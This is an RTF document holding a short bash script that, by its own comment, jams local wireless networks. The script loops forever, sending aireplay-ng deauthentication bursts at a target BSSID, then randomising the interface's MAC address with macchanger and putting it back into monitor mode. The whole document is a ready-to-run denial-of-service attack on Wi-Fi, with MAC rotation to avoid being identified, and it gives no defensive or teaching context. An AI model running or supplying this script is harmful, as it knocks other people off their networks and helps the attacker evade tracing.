{\rtf1\ansi\ansicpg1252\cocoartf1561\cocoasubrtf400
{\fonttbl\f0\fnil\fcharset0 AmericanTypewriter-Semibold;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
{\info
{\author zero_kelvin}}\paperw11900\paperh16840\margl1440\margr1440\vieww20640\viewh12600\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\b\fs36 \cf0 #!/bin/bash\
\
# --------------------------------------------------------------------------------\
#       Bash script to jam local wireless signals.\
#               1. The script will perform 5 attacks. \
#               2. It then changes the MAC address and then starts again.\
#\
# --------------------------------------------------------------------------------\
\
\
\
\
while [[ true ]]; do\
        aireplay-ng -0 5 -a [BSSID-Number] wlan0\
        ifconfig wlan0 down\
        macchanger -r wlan0 | grep "New MAC"\
        iwconfig wlan0 mode monitor\
        ifconfig wlan0 up\
        iwconfig wlan0 | grep Mode\
        sleep 3\
        echo "Waiting!!!!!"\
\
done}